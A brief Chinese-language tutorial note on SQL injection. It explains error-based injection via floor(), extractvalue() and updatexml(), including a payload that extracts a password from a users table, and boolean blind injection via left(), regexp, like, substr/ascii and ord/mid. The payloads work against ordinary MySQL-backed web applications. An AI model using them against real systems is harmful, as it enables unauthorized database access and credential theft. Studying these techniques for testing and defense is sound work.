报错注入
原理:构造payload让信息通过错误提示回显出来
应用场景:查询不会先内容,但是会打印错误信息
upload、insert等语句,会打印错误信息
方法:凡是可以让错误信息显示的函数(语句),都能实现报错注入
floor()
select count(*) from infomation_schema.tables group by concat((select version(),floor(rand(0)*2));
extractvalue()
updatexml()
如果返回值超过32位,显示不出来,就使用substrr进行截取
and updatexml(1,concat(0x7e,(select substr(concat(password),1,2)from users limit 0,1),0x7e),1)--+
布尔盲注
原理:我们可以通过构造语句,来判断数据库信息的正确性,在通过页面的“真”和“假”来识别我们的判断是否正确,这就是布尔盲注。
方法:
构造逻辑判断语句,判断信息的真假,取出所有的真值,实现SQL注入
1、 left()函数 left(database(),b)>'a'
//database() 显示数据库名称,left(a,b)从左侧截取前b位
2、 regexp
//select user() regexp '^r' 正则表达式的用法,user()结果为root,regexp为匹配root的正则表达式
3、 like
//select user() like 'ro%',与regexp类似,使用like进行匹配
4、 substr()函数
ascii()函数
//ascii(substr((select database()),1,1))=115 避免过滤和转义单引号
5、 ord()函数
mid()函数
//ord(mid((select user()),1,1))=114
mid(a,b,c)从位置b开始,截取a字符串的c位。ord()函数同ascii(),将字符转为ascii值